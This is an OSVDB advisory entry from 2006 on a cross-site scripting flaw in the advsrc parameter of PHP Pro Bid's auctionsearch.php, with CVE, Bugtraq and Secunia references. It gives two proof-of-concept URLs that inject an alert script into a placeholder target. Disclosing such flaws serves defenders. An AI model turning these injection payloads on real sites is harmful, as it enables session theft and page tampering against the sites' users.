PHP Pro Bid auctionsearch.php advsrc Variable XSS

2006-07-25T11:49:17
ID OSVDB:27544
Type osvdb
Reporter Ellipsis Security (securityconnection@gmail.com)
Modified 2006-07-25T11:49:17

Description

Manual Testing Notes

http://[target]/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>
http://[target]/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>

References:

Vendor URL: http://www.phpprobid.com/
Secunia Advisory ID: 21201
Related OSVDB ID: 27545
Related OSVDB ID: 27546
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0474.html
CVE-2006-3927
Bugtraq ID: 19158